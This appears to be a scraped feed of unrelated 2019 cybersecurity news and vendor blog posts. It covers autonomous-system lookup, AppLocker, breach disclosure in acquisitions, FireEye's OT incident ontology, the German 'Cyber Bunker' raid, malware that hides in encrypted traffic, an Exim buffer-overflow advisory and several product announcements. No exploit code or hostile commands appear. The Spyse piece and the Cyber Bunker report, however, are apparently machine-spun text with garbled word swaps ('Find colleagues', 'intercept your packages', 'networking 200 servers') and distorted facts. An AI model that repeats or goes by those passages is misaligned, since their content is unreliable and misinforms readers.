Step 3: Find colleagues–The difficult aspect of the web is that you need to be connected to one side of it in order to achieve anything. If you’re looking at only one other AS, you don’t have to operate BGP. However, if you did, you can use a personal autonomous system number that can readily be replaced by your upstream supplier. Then they will transfer the remainder of the internet along your paths.

Step 4: Get a router that can handle the entire Internet routing table–This is a strong router that you are not able to purchase at your local store. One alternative would be to create a router yourself from a server running the operating system of the router.

How AS is used by Hackers

When a business expands and invests in its own AS, safety issues come into play over your network and traffic. You likely have lots of personal data that you want to maintain private. Hackers are hunting for data, and can access your network with sufficient ability, intercept your packages and have remote access to all your pcs to install malicious code on your server.

It is not difficult to locate the own IP range owner. Many services provide extensive data about organisations like WHOIS, CIDR, etc. Knowing this information can assist you identify links between businesses, figure out the attack surface and perform a nasty target DDoS attack.

This is where the cyber security industry enters. There are instruments that display vulnerabilities and assist remove malware from your network. However, few of these instruments are effectively designed to prevent attacks.

On the market, the upcoming cyber security business Spyse is creating a solution based on mass information collection from the internet. Spyse utilizes these information to produce a comprehensive network vulnerability map. This instrument helps safety experts to predict vulnerabilities, to stay ahead of hackers and to prevent future system threats.

Spyse recently published various instruments for safety technicians, penters, sysadmins and company analysts in beta-test mode. ASlookup is one of their most latest creations that enables you to monitor the infrastructure of your organization, network or company.

The Spyse team is aware that it is best to avoid threats in advance; their services thus help you determine the attack surface and recognize vulnerabilities prior to exposure. Moreover, they give all fresh users 3 free credits.

The post How to Explore Autonomous Systems in Business Network and the Way Hackers use it appeared first on .

Getting Started With AppLocker

John Strand // I have quite a few calls with customers who do not know where to begin when it comes to application whitelisting. Often, the approach some organizations take is to try and implement full application whitelisting on every single application across their entire environment.  While this goal is fun and seems like a […]

The post Getting Started With AppLocker appeared first on Black Hills Information Security.

Hiding a Data Breach Can Derail an Acquisition

Hiding a Data Breach Can Derail an Acquisition

Companies can drive down their value by hiding or mishandling data breaches, according to research by the world's largest nonprofit association of certified cybersecurity professionals, (ISC)².

Researchers questioned 250 mergers and acquisitions (M&A) experts based in the US to determine how important a company's cybersecurity program and breach history is in deciding its value ahead of a potential purchase. 

Findings shared in the Cybersecurity Assessments in Mergers and Acquisitions report, released today, revealed that 49% of M&A experts have seen deals derailed after due diligence brought an undisclosed breach to light. 

Researchers also found that 86% of respondents said if a company publicly reported a breach of customer or other critical data in its past, it would detract from the acquisition price assigned. However, if that breach was satisfactorily addressed and fixed, and any potential fines were already paid, 88% said it would minimize the negative impact to the overall valuation.

"While every company needs to make their own decisions regarding proper data breach disclosure policies, the research clearly shows that in the context of a possible sale, not being transparent about past breaches can literally kill a potential deal, or can seriously affect the ultimate sale price," John McCumber, director of cybersecurity advocacy, North America, for (ISC)², told Infosecurity Magazine.

Having strong cybersecurity can give a company the edge over a competitor. Researchers found that 77% of experts had recommended a particular company be acquired over another because of the strength of its cybersecurity program.

The report is a reality check for companies who think a lackluster approach to cybersecurity won't diminish their stock. All respondents stated that cybersecurity audits are now a standard practice in arriving at a dollars and cents valuation, and 96% said that cybersecurity readiness factors into the calculation when they are assessing the overall monetary value of a potential acquisition target.

"While most companies would rather not experience a breach in the first place, the study shows that those who deal with one, handle it well, and make adjustments to policies in order to limit their chances of a recurrence are looked at more favorably by potential buyers than those who seem doomed to repeat their mistakes," McCumber told Infosecurity Magazine.

"Each deal is different. But what our report indicates is that in order to maximize the value of a deal, the acquisition target should ideally self-audit their cybersecurity program and readiness level in advance."

The FireEye OT-CSIO: An Ontology to Understand, Cross-Compare, and Assess Operational Technology Cyber Security Incidents

The FireEye Operational Technology Cyber Security Incident Ontology (OT-CSIO)

While the number of threats to operational technology (OT) have significantly increased since the discovery of Stuxnet – driven by factors such as the growing convergence with information technology (IT) networks and the increasing availability of OT information, technology, software, and reference materials – we have observed only a small number of real-world OT-focused attacks. The limited sample size of well-documented OT attacks and lack of analysis from a macro level perspective represents a challenge for defenders and security leaders trying to make informed security decisions and risk assessments.

To help address this problem, FireEye Intelligence developed the OT Cyber Security Incident Ontology (OT-CSIO) to aid with communication with executives, and provide guidance for assessing risks. We highlight that the OT-CSIO focuses on high-level analysis and is not meant to provide in-depth insights into the nuances of each incident.

Our methodology evaluates four categories, which are targeting, impact, sophistication, and affected equipment architecture based on the Purdue Model (Table 7). Unlike other methodologies, such as MITRE's ATT&CK Matrix, FireEye Intelligence's OT-CSIO evaluates only the full aggregated attack lifecycle and the ultimate impacts. It does not describe the tactics, techniques, and procedures (TTPs) implemented at each step of the incident. Table 1 describes the four categories. Detailed information about each class is provided in Appendix 1.


Table 1: Categories for FireEye Intelligence's OT-CSIO

The OT-CSIO In Action

In Table 2 we list nine real-world incidents impacting OT systems categorized according to our ontology. We highlight that the ontology only reflects the ultimate impact of an incident, and it does not account for every step throughout the attack lifecycle. As a note, we cite public sources where possible, but reporting on some incidents is available to FireEye Threat Intelligence customers only.

Incident

Target

Sophistication

Impact

Impacted Equipment

Maroochy Shire Sewage Spill

(2000)

ICS-targeted

Medium

Disruption

Zone 3

Stuxnet

(2011)

ICS-targeted

High

Destruction

Zones 1-2

Shamoon

(2012)

ICS-targeted

Low

Destruction

Zone 4-5

Ukraine Power Outage

(2015)

ICS-targeted

Medium

Disruption, Destruction

Zone 2

Ukraine Power Outage

(2016)

ICS-targeted

High

Disruption

Zones 0-3

WannaCry Infection on HMIs

(2017)

Non-targeted

Low

Disruption

Zone 2-3

TEMP.Isotope Reconnaissance Campaign

(2017)

ICS-targeted

Low

Data Theft

Zones 2-4

TRITON Attack

(2017)

ICS-targeted

High

Disruption (likely building destructive capability)

Zone Safety, 1-5

Cryptomining Malware on European Water Utility

(2018)

Non-targeted

Low

Degradation

Zone 2/3

Financially Motivated Threat Actor Accesses HMI While Searching for POS Systems

(2019)

Non-targeted

Low

Compromise

Zone 2/3

Portable Executable File Infecting Malware Impacting Windows-based OT assets

(2019)

Non-targeted

Low

Degradation

Zone 2-3

Table 2: Categorized samples using the OT-CSIO

The OT-CSIO Matrix Facilitates Risk Management and Analysis

Risk management for OT cyber security is currently a big challenge given the difficulty of assessing and communicating the implications of high-impact, low-frequency events. Additionally, multiple risk assessment methodologies rely on background information to determine case scenarios. However, the quality of this type of analysis depends on the background information that is applied to develop the models or identify attack vectors. Taking this into consideration, the following matrix provides a baseline of incidents that can be used to learn about past cases and facilitate strategic analysis about future case scenarios for attacks that remain unseen, but feasible.


Table 3: The FireEye OT-CSIO Matrix

As Table 3 illustrates, we have only identified examples for a limited set of OT cyber security incident types. Additionally, some cases are very unlikely to occur. For example, medium- and high-sophistication non-targeted incidents remain unseen, even if feasible. Similarly, medium- and high-sophistication data compromises on OT may remain undetected. While this type of activity may be common, data compromises are often just a component of the attack lifecycle, rather than an end goal.

How to Use the OT-CSIO Matrix

The OT-CSIO Matrix presents multiple benefits for the assessment of OT threats from a macro level perspective given that it categorizes different types of incidents and invites further analysis on cases that have not yet been documented but may still represent a risk to organizations. We provide some examples on how to use this ontology:

  • Classify different types of attacks and develop cross-case analysis to identify differences and similarities. Knowledge about past incidents can be helpful to prevent similar scenarios and to think about threats that have not been evaluated by an organization.
  • Leverage the FireEye OT-CSIO Matrix for communication with executives by sharing a visual representation of different types of threats, their sophistication and possible impacts. This tool can make it easier to communicate risk despite the limited data available for high-impact, low-frequency events. The ontology provides an alternative to assess risk for different types of incidents based on the analysis of sophistication and impact, where increased sophistication and impact generally equates to higher risk.
  • Develop additional case scenarios to foresee threats that have not been observed yet but may become relevant in the future. Use this information as support while working on risk assessments.

Outlook

FireEye Intelligence's OT-CSIO seeks to compile complex incidents into practical diagrams that facilitate communication and analysis. Categorizing these events is useful for visualizing the full threat landscape, gaining knowledge about previously documented incidents, and considering alternative scenarios that have not yet been seen in the wild. Given that the field of OT cyber security is still developing, and the number of well-documented incidents is still low, categorization represents an opportunity to grasp tendencies and ultimately identify security gaps.

Appendix 1: OT-CSIO Class Definitions

Target

This category comprises cyber incidents that target industrial control systems (ICS) and non-targeted incidents that collaterally or coincidentally impact ICS, such as ransomware.


Table 4: Target category

Sophistication

Sophistication refers to the technical and operational sophistication of attacks. There are three levels of sophistication, which are determined by the analyst based on the following criteria.


Table 5: Sophistication category

Impact

The ontology reflects impact on the process or systems, not the resulting environmental impacts. There are five classes in this category, including data compromise, data theft, degradation, disruption, and destruction.


Table 6: Impact category

Impacted Equipment

This category is divided based on FireEye Intelligence's adaptation of the Purdue Model. For the purpose of this ontology, we add an additional zone for safety systems.


Table 7: Impacted equipment

Darknet ‘Cyber Bunker’ Server Hosted in Germany

The German authorities said on Friday they had bust a network hosting illegal trading platforms called Darknet on servers in the old NATO bunker, stolen information and child pornography online.

In a series of raids Thursday, seven suspects were arrested targeting the operators of the service “Bulletproof Hoster,” located in so-called the “Cyber Bunker,” the police and the prosecutors said.

The servers host, or provide internet architecture for, illegal websites which also stored stolen information and falsified records and used large-scale cyber attacks.

Thirteen suspected participants— 12 males and one female, aged 20 to 59 — reportedly set up and run strong servers inside a NATO bunker in the Rhineland-Palatinate city of Traben-Trarbach.

Four Dutch, two Germans, and one Bulgarian were held in custody.

In Germany and other European nations several hundred police operators engaged in raids, networking 200 servers, countless information carriers and mobile telephones and a considerable amount of money.

The websites included the once second biggest Darknet medicines market place in the world, the’ Wall Street Market ‘ e-commerce platform, which researchers broke down previously this year.

A server situated within a cyber bunker was also monitored by an internet assault affecting 1,25 million routers of the German supplier Deutsche Telekom in November 2016, the national Public Prosecutor’s Office said.

The servers also included “Fraudsters” and “lifestylepharma” as well as “Cannabis Road.”

The post Darknet ‘Cyber Bunker’ Server Hosted in Germany appeared first on .

Our World in Transition and Our Future Demands

October is Cybersecurity Awareness Month and for me, it’s a time to reflect on where we’ve been and how far we’ve come, study the trends and challenges we face today, and look ahead to the next generation of opportunities facing not only the security community, but society at large.

In my more than 30 years in the security industry, it’s been interesting to see how technology has evolved and changed the world. Security started off as a ‘systems’ conversation. Now, technology touches everyone’s lives, and as a result, cybersecurity affects us all – individuals, businesses, cities, countries, our global community.

From Use to Reliance

During our lifetimes, we’ve shifted from using technology to, in very subtle ways, becoming reliant on it. Whether we realize it or not, these subtleties have made us dependent on technology. The notion of ‘always on’ access to data is highly disruptive to us when we don’t have it. Take maps for example: using a printed map is foreign to us today, and when the maps on our devices don’t work, we’re lost, literally.

When technology is unavailable, in many respects we feel ‘out of the loop’ and behind in knowing what’s going on. There’s a lagging indicator that says, ‘Now that we have access to current information, we always expect this level of connectivity – we depend on it.’ That reliance makes securing the data and the systems that deliver it to us that much more vital.

A Confluence of Change – All in Three Years

Since 2017, three major transitions have occurred that illustrate how complicated cybersecurity has become for us all globally. These transitions have caused security professionals to feel the pressure and scrutiny from a number of organizations that have upped their games. They’re having to catch up to a confluence of changes, all occurring at the same time:

1. Technology

Prior to 2017, IT predominantly built and ran an organization’s technology infrastructure, spending on security and hoping it works, relying on best-of-breed products, and managing it all reactively.

We all needed cybersecurity, but how could we net the best results – the greatest level of efficacy – from the solutions we purchased? Exactly how much value are we getting when spending on a solution? Is it all integrated as a best strategy or are we simply buying technology from the leading brand name or best advertised?

Today, leading IT teams build, buy and run security, use a ‘best-of-integrated’ architecture approach and emphasize visibility, controls, measures and proactive approaches to security that drive efficacy and value.

2. Laws, Regulations, and Customer Requirements

This transition shows the increasing influence that laws, regulations and customer requirements have on a technology or service provider to its clients, and in turn, to their customers, citizens, colleagues, families and friends.

The formalization of laws and regulations – from the EU-NIS Directive to GDPR to the Australian Government Protective Security Policy Framework to the California Consumer Privacy Act, to name a few – have driven greater scrutiny and reform. It’s accelerated substantially in a short period of time, from ‘do-it-yourself’ disharmonious regulations and rule, to a set of country, inter-country and international use standards.

Now corporate and government leaders across the international community are being held accountable. This transition from varying self-rule and self-regulation to accountability, breach reporting and disclosure highlights the implications of mishandling data and privacy through significant fines and executive firings.

In many respects, it’s been a long time coming. What’s interesting is that now that it’s here, it’s caught many off-guard – and it’s by no means slowing down.

3. Internal Oversight

When I started in InfoSec, security was mainly an engineering or computer science discipline. The security team was often avoided so that they couldn’t suppress innovation because of security concerns. The business was self-governing with inconsistent levels of oversight.

Today, internal reporting to and oversight by executive leadership, the CEO, the board of directors and shareholders are becoming standard practice to ensure proper governance. In part, it is a response to the regulatory landscape and the need for higher levels of accountability and oversight from within. It’s also based on the criticality of technology moving from something we use to something we rely on to deliver a service.

All three of these transitions came to the fore in a very short period of time to know how to effectively react, govern and solve for it. By the way, we’re all going through this and determining our own strategies to face the challenges, net the value they deliver, and understand how to be safe and secure in and around it all.

Our Future Demands

Today, there are about 4 billion internet users globally – all told about 10X of what it was in 2000. We’re in a world where everything is being connected and generating data. This will have significant impact on the next few years in particular and even more substantially into the future.

By next year, there will be about 200 billion devices ‘on air,’ which includes cars, telemetry in cities, sensors and a multitude of other connected devices. Two-hundred billion is almost an ephemeral number, but it’s not to be underestimated because the number of vendors creating IoT-connected technology is growing probably 3-4X every year than the prior year. That’s a trend that I don’t see slowing down any time soon.

By 2021, cybercrime is estimated to be a $6 trillion industry – a very profitable industry, though I don’t recommend it as a career choice. It does illustrate the depth and breadth of the challenge – that it’s an international and global issue that we all have to work together to solve because it’s something that we all face.

Raising the Bar for a More Secure Future

Governments and businesses globally are raising the bar to meet the challenge around product assurance, cloud assurance, IoT, lawful intercept, data protection, privacy and the like. Some 30-odd countries are writing or revising their cybersecurity strategies and each can have profound implications on how data is shared and how systems are built.

So, during Cybersecurity Awareness Month, consider what you can do to make the world more safe and secure, and take action. What can you do as individuals? How are you protecting yourself online and helping your business, colleagues, friends and family to do the same? Each individual act, when taken together, can move us all to a more secure future.

We’re not looking for headlines that show ‘good’ or ‘bad.’ We need trend lines that show that what we’re doing collectively is moving us all towards lower risk. As long as the trend line is going in the right direction, we’re doing what we need to do – and we must all do our part.

For governments, companies and individuals alike, Cisco’s Cybersecurity Awareness Month site offers events, activities and educational content, and ways to get involved. The Cisco Trust Center also offers resources to help you with security, data protection and privacy. Both feature links to security reports, videos, threat intelligence, thought leadership and more that will keep you informed.

McAfee Receives the 2019 Security Excellence Award From IoT Evolution

If you’re like most users, you’ve probably adopted several smart devices into your home over the last few years. Whether it be voice assistants, smart TVs, thermostats, or gaming systems, IoT devices help make our lives easier. But with greater connectivity also comes greater exposure to online threats. However, that doesn’t mean users should avoid using IoT technology altogether. With the help of smart security, users can feel safe and protected as they bring new gadgets into their lives. Solutions like McAfee Secure Home Platform, which is now the winner of the IoT Security Excellence Award, can help users connect with confidence.

Here at McAfee, we know smart security is more important now than ever before. That’s why we work tirelessly to ensure that our solutions provide consumers with the best protection possible. For example, McAfee Secure Home Platform provides automatic protection for the entire home network by automatically securing connected devices through a router with McAfee protection. It’s through the proactive evolution of our products that McAfee Secure Home Platform has received this 2019 IoT Security Excellence Award from IoT Evolution World, the leading publication covering IoT technologies.

The IoT Security Excellence Award celebrates the most innovative products and solutions in the world of IoT. It honors technology empowered by the new availability of information being deduced, inferred, and directly gathered from sensors, systems, and anything else that is supporting better business and personal decisions. Winners of this award are recognized for their innovation in gathering and managing information from connected devices that often are not associated with IoT.

“We are thrilled that McAfee Secure Home Platform has been recognized by IoT Evolution World as a recipient of the 2019 IoT Evolution Security Excellence Award. We continue to prioritize creating solutions that lead with ease of use and first-class protection, in order for consumers to best protect every connected device in their homes.” – Gary Davis, Chief Consumer Security Evangelist at McAfee.

As long as technology continues to evolve, so will the threat landscape. This is what drives us to keep developing leading solutions that help you and your loved ones connect with confidence. Solutions like McAfee Secure Home Platform are leading the charge in providing top home network security while still empowering users to enjoy their smart devices.

To stay updated on the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post McAfee Receives the 2019 Security Excellence Award From IoT Evolution appeared first on McAfee Blogs.

Threats in encrypted traffic

There was a time when the web was open. Quite literally—communications taking place on the early web were not masked in any significant fashion. This meant that it was fairly trivial for a bad actor to intercept and read the data being transmitted between networked devices.

This was especially troublesome when it came to sensitive data, such as password authentication or credit card transactions. To address the risks of transmitting such data over the web, traffic encryption was invented, ushering in an era of protected communication.

Today more than half of all websites use HTTPS. In fact, according to data obtained from Cisco Cognitive Intelligence, the cloud-based machine learning engine behind Stealthwatch—Cisco’s network traffic analysis solution—82 percent of HTTP/HTTPS traffic is now encrypted.

The adoption of encrypted traffic has been a boon for security and privacy. By leveraging it, users can trust that sensitive transactions and communications are more secure. The downside to this increase in encrypted traffic is that it’s harder to separate the good from the bad. As adoption of encrypted traffic has grown, masking what’s being sent back and forth, it’s become easier for bad actors to hide their malicious activity in such traffic.

A brief history of encrypted traffic

The concerns around security and privacy in web traffic originally led Netscape to introduce the Secure Sockets Layer (SSL) protocol in 1995. After a few releases, the Internet Engineering Task Force (EITF) took over the protocol, which released future updates under then name “Transport Layer Security” (TLS). While the term SSL is often used informally to refer to both today, the SSL protocol has been depreciated and replaced by TLS.

TLS protocol works directly with existing protocols and encrypts the traffic. This is where protocols like HTTPS come from— the hypertext transfer protocol (HTTP) is transmitted over SSL/TLS. While HTTPS is by far the most common protocol secured by TLS, other popular protocols, such as SFTP and SMTPS can take advantage of the protocol. Even lower-level protocols like TCP and UDP can use TLS.

Threat actors follow suit

Attackers go to great pains to get their threats onto systems and networks. The last thing they want after successfully penetrating an organization is to have their traffic picked up by network-monitoring tools. Many threats are now encrypting their traffic to prevent this from happening.

Where standard network monitoring tools might be able to quickly identify and block unencrypted traffic in the past, TLS provides a mask for the communication threats utilize to operate. In fact, according to data taken from Cognitive Intelligence, 63 percent of all threat incidents discovered by Stealthwatch were discovered in encrypted traffic.

In terms of malicious functionality, there are a number of ways that threats use encryption. From command-and-control (C2) communications, to backdoors, to exfiltrating data, attackers consistently use encryption to hide their malicious traffic.

Botnets

By definition, a botnet is a group of Internet-connected, compromised systems. Generally, the systems in a botnet are connected in a client-server or a peer-to-peer configuration. Either way, the malicious actors usually leverage a C2 system to facilitate the passing of instructions to the compromised systems.

Common botnets such as Sality, Necurs, and Gamarue/Andromeda have all leveraged encryption in their C2 communications to remain hidden. The malicious activity carried out by botnets include downloading additional malicious payloads, spread to other systems, perform distributed-denial-of-service (DDoS) attacks, send spam, and other malicious activities.

Botnets mask C2 traffic with encryption.

RATs

The core purpose of a RAT is to allow an attacker to monitor and control a system remotely. Once a RAT manages to implant itself into a system, it needs to phone home for further instructions. RATs require regular or semi-regular connections to the internet, and often use a C2 infrastructure to perform their malicious activities.

RATs often attempt take administrative control of a computer and/or steal information from it, ranging from passwords, to screenshots, to browser histories. It then sends the stolen data back to the attacker.

Most of today’s RATs use encryption in order to mask what is being sent back and forth. Some examples include Orcus RAT, RevengeRat, and some variants of Gh0st RAT.

RATs use encryption when controlling a computer.

Cryptomining

Cryptocurrency miners establish a TCP connection between the computer it’s running on and a server. In this connection, the computer is regularly receiving work from the server, processing it, then sending it back to the server. Maintaining these connections is critical for cryptomining. Without it the computer would not be able to verify its work.

Given the length of these connections, their importance, and the chance that they can be identified, malicious cryptomining operations often ensure these connections are encrypted.

It’s worth noting that encryption here can apply to any type of cryptomining, both deliberate and malicious in nature. As we covered in our previous Threat of the Month entry on malicious cryptomining, the real difference between these two types of mining is consent.

Miners transfer work back and forth to a server.

Banking trojans

In order for a banking trojan to operate, it has to monitor web traffic on a compromised computer. To do that, some banking trojans siphon web traffic through a malicious proxy or exfiltrate data to a C2 server.

To keep this traffic from being discovered, some banking trojans have taken to encrypting this traffic. For instance, the banking trojan IcedID uses SSL/TLS to send stolen data. Another banking trojan called Vawtrak masks its POST data traffic by using a special encoding scheme that makes it harder to decrypt and identify.

Banking trojans encrypt the data they’re exfiltrating.

 

Ransomware

The best-known use of encryption in ransomware is obviously when it takes personal files hostage by encrypting them. However, ransomware threats often use encryption in their network communication as well. In particular, some ransomware families encrypt the distribution of decryption keys.

How to spot malicious encrypted traffic

One way to catch malicious encrypted traffic is through a technique called traffic fingerprinting. To leverage this technique, monitor the encrypted packets traveling across your network and look for patterns that match known malicious activity. For instance, the connection to a well-known C2 server can have a distinct pattern, or fingerprint. The same applies to cryptomining traffic or well-known banking trojans.

However, this doesn’t catch all malicious encrypted traffic, since bad actors can simply insert random or dummy packets into their traffic to mask the expected fingerprint. To identify malicious traffic in these cases, other detection techniques are required to identify the traffic, such as machine learning algorithms that can identify more complicated malicious connections. Threats may still manage to evade some machine learning detection methods, so implementing a layered approach, covering a wide variety of techniques, is recommended.

In addition, consider the following:

  • Stealthwatch includes Encrypted Traffic Analytics. This technology collects network traffic and uses machine learning and behavioral modeling to detect a wide range of malicious encrypted traffic, without any decryption.
  • The DNS protection technologies included in Cisco Umbrella can prevent connections to malicious domains, stopping threats before they’re even able to establish an encrypted connection.
  • An effective endpoint protection solution, such as AMP for Endpoints, can also go a long way towards stopping a threat before it starts.

Enjoyed reading this Threat of the Month? Subscribe to the Threat of the Month blog series and get alerted when new blogs are published. 

 

TLS version enforcement capabilities now available per certificate binding on Windows Server 2019

At Microsoft, we often develop new security features to meet the specific needs of our own products and online services. This is a story about how we solved a very important problem and are sharing the solution with customers. As engineers worldwide work to eliminate their own dependencies on TLS 1.0, they run into the complex challenge of balancing their own security needs with the migration readiness of their customers. Microsoft faced this as well.

To date, we’ve helped customers address these issues by adding TLS 1.2 support to older operating systems, by shipping new logging formats in IIS for detecting weak TLS usage by clients, as well as providing the latest technical guidance for eliminating TLS 1.0 dependencies.

Now Microsoft is pleased to announce a powerful new feature in Windows to make your transition to a TLS 1.2+ world easier. Beginning with KB4490481, Windows Server 2019 now allows you to block weak TLS versions from being used with individual certificates you designate. We call this feature “Disable Legacy TLS” and it effectively enforces a TLS version and cipher suite floor on any certificate you select.

Disable Legacy TLS also allows an online or on-premise web service to offer two distinct groupings of endpoints on the same hardware: one which allows only TLS 1.2+ traffic, and another which accommodates legacy TLS 1.0 traffic. The changes are implemented in HTTP.sys, and in conjunction with the issuance of additional certificates, allow traffic to be routed to the new endpoint with the appropriate TLS version. Prior to this change, deploying such capabilities would require an additional hardware investment because such settings were only configurable system-wide via registry.

For a deep dive on this important new feature and implementation details and scenarios, please see Technical Guidance for Disabling Legacy TLS. Microsoft will also look to make this feature available in its own online services based on customer demand.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post TLS version enforcement capabilities now available per certificate binding on Windows Server 2019 appeared first on Microsoft Security.

Open Document format creates twist in maldoc landscape

By Warren Mercer and Paul Rascagneres.

Introduction

Cisco Talos recently observed attackers changing the file formats they use in an attempt to thwart common antivirus engines. This can happen across other file formats, but today, we are showing a change of approach for an actor who has deemed antivirus engines perhaps “too good” at detecting macro-based infection vectors.  We’ve noticed that the OpenDocument (ODT) file format for some Office applications can be used to bypass these detections. ODT is a ZIP archive with XML-based files used by Microsoft Office, as well as the comparable Apache OpenOffice and LibreOffice software.

There have recently been multiple malware campaigns using this file type that are able to avoid antivirus detection, due to the fact that these engines view ODT files as standard archives and don’t apply the same rules it normally would for an Office document. We also identified several sandboxes that fail to analyze ODT documents, as it is considered an archive, and the sandbox won’t open the document as a Microsoft Office file. Because of this, an attacker can use ODT files to deliver malware that would normally get blocked by traditional antivirus software.

We only found a few samples where this file format was used. The majority of these campaigns using malicious documents still rely on the Microsoft Office file format, but these cases show that the ODT file format could be used in the future at a more successful rate. In this blog post, we’ll walk through three cases of OpenDocument usage. The two first cases targets Microsoft Office, while the third one targets only OpenOffice and LibreOffice users. We do not know at this time if these samples were used simply for testing or a more malicious context.

Read more at Talosintelligence.com

Pennsylvania Might Be Second State to Criminalize Cyber-Flashing

Pennsylvania Might Be Second State to Criminalize Cyber-Flashing

Pennsylvania could follow Texas to become the second US state to make cyber-flashing illegal. 

Philadelphia County state representative Mary Isaacson told Infosecurity Magazine that she plans to introduce a bill to ban the unsolicited electronic transmission of sexually explicit and obscene images in the Keystone State at the end of October.

Isaacson sent a memorandum to all 203 members of the Pennsylvania House of Representatives on September 20, calling for them to co-sponsor her proposed legislation. 

"Despite the success of the #MeToo movement, sexual harassment remains a serious problem in our society, particularly due to online forms of sexual harassment. 20% of women and 10% of men ages 18 to 29 report having been sexually harassed online," wrote Isaacson in the memorandum, before calling on members to "please join me in combatting online sexual harassment and ensuring the dignity of all Pennsylvanians."

Speaking to Infosecurity Magazine, Isaacson said that although she hadn't personally received any unsolicited sexually explicit images, she had heard stories from her children about cyber-flashing experienced by their peers. 

"I represent a lot of millennials, and I am a parent of two teens. I worry for my son and my daughter," said Isaacson. "With Air Dropping technology, if a group of teens are at a concert, someone there can send them obscene images that the teens will see whether they have given permission or not. Their privacy is being invaded when they are just trying to have a good time."

Asked what she thought drove people to become cyber-flashers, Isaacson said: "I think that it's their psychology, that they do it to bully and intimidate people and invade their privacy. It's a very serious societal problem that affects everyone, men as well as women."

Isaacson's proposed legislation follows the passage of House Bill 2789 into law in Texas on August 31 this year. Under the new law, the electronic transmission of sexually explicit material without the recipient's consent became a Class C misdemeanor, punishable by a fine of up to $500.

Describing how her bill will differ from what was passed in the Lone Star State, Isaacson said: "Right now, it's modeled after what was done in Texas, but it could possibly change."

Isaacson, who was on the road when speaking to Infosecurity Magazine, was unable to state exactly how many members had answered her co-sponsorship call. However, the state representative was able to confirm that her proposed legislation has secured bipartisan support.

A new critical flaw in Exim exposes email servers to remote attacks

Exim maintainers released an urgent security update to address a critical security flaw that could allow a remote attacker to potentially execute malicious code on targeted servers.

Exim maintainers released an urgent security update, Exim version 4.92.3, to address a critical security vulnerability that could allow a remote attacker to crash or potentially execute malicious code on targeted email servers.

The flaw is a heap-based buffer overflow, tracked as CVE-2019-16928, that resides in the string_vformat (string.c). An attacker could exploit the flaw using an extraordinary long EHLO string to crash the Exim process that is receiving the message.

“There is a heap-based buffer overflow in string_vformat (stringc). The currently known exploit uses extraordinary long EHLO string to crash the Exim process that is receiving the message. While this mode of operation Exim already dropped its privileges, other paths to reach the vulnerable code may exist.” reads the security advisory published by the maintainers.

The CVE-2019-16928 flaw was reported by Jeremy Harris of Exim Development Team, it affects all versions of the Exim email server software from 4.92 up to and the version 4.92.2. The expert also released a PoC exploit for this vulnerability.

Early September, the Exim development team has addressed another vulnerability in the popular mail server, tracked as CVE-2019-15846. The vulnerability could be exploited by local and remote attackers to execute arbitrary code with root privileges.

The vulnerability is a heap overflow that affects version 4.92.1 and prior of Exim mail server that accepts TLS connections. The vulnerability affects both GnuTLS and OpenSSL.

In mid-June, researchers observed several threat actors exploiting another flaw in the popular software, tracked as CVE-2019-10149, that resides in the deliver_message() function in /src/deliver.c and it is caused by the improper validation of recipient addresses. The issue could lead to remote code execution with root privileges on the mail server. The CVE-2019-10149 flaw was addressed the Exim’s development team with the release of version 4.92 in February.

The flaw is easily exploitable by a local and a remote attacker in certain non-default configurations, experts believe that threat actors will start using it in attacks in the wild.

Exim also patched a severe remote command execution vulnerability (CVE-2019-10149) in its email software that was actively exploited in the wild by various groups of hackers to compromise vulnerable servers.

The major Linux distributions, including UbuntuArch LinuxFreeBSDDebian, and Fedora, already released security updates.

Pierluigi Paganini

(SecurityAffairs – Mail Server, hacking)

The post A new critical flaw in Exim exposes email servers to remote attacks appeared first on Security Affairs.

BlackBerry Launches New Cybersecurity Development Labs

BlackBerry Launches New Cybersecurity Development Labs

Security software and services company BlackBerry Limited has announced the launch BlackBerry Advanced Technology Development Labs (BlackBerry Labs), a new business unit operating at the forefront of research and development in the cybersecurity space.

The Labs will be led by CTO Charles Eagan and will include a team of over 120 software developers, architects, researchers, product leads and security experts working to identify, explore and create new technologies to ensure BlackBerry is on the cutting edge of security innovation.

The company stated that initial projects from BlackBerry Labs will focus on machine learning approaches to security in partnership with BlackBerry’s existing Cylance, Enterprise and QNX business units.

“The establishment of BlackBerry Labs is the latest in a series of strategic moves we’ve taken to ensure our customers are protected across all endpoints and verticals in the new IoT,” said Charles Eagan, BlackBerry CTO. “Today’s cybersecurity industry is rapidly advancing and BlackBerry Labs will operate as its own business unit solely focused on innovating and developing the technologies of tomorrow that will be necessary for our sustained competitive success, from A to Z; artificial intelligence to zero trust environments.”

Pay What You Wish — 9 Hacking Certification Training Courses in 1 Bundle

The greatest threat facing most nations is no longer a standing army. It's a hacker with a computer who can launch a crippling cyber attack from thousands of miles away—potentially taking down everything from server farms to entire power grids with a few lines of code. So it should come as no surprise that virtually every major company in both the public and private sector—as well as national

Social media manipulation as a political tool is spreading

Researchers say 'cyber troops' in 70 countries are using it to automate suppression, mount smear campaigns, or spread disinformation.

Opening up Europe’s Cyber Future

Europe will face a complex cocktail of cyber challenges in the coming five years, from safeguarding our critical infrastructure to protecting itself from election interference and disinformation whilst safeguarding citizen data privacy rights. A new set of leaders is preparing to take office in the European Commission’s headquarters in Brussels to take on these challenges. McAfee, at the cutting edge of cyber defence and mitigation, stands ready to help them embed the principles of open information exchange and interoperability that form the basis of a robust cybersecurity policy.

The principles of openness and interoperability have long been to key to the growth of the digital economy. But in the field of cybersecurity, these principles take on an even greater importance. Openness and interoperability are a precondition for vibrant competition and rapid innovation, and competition authorities should remain vigilant to ensure it remains in place even as the digital ecosystem begins to gravitate around the giants that best harness the network effects digital technologies can enable.

But openness and interoperability are not just about innovation. They have become cornerstones for keeping citizens safe as they go about their lives. This is because no single actor has all the information needed to prevent, mitigate or remedy a cyber incident. McAfee has a proud history of precisely such partnerships, sharing emerging threat information in real-time with authorities, and helping them keep the critical infrastructure that we all rely on up and running even as they become prime targets for cyberattacks. Hospitals, transport networks and energy grids are the lifeblood of our society, and we need to keep them safe. Hence, we think it’s right that this Commission focus on their needs and develop new rules to safeguard these vital assets.

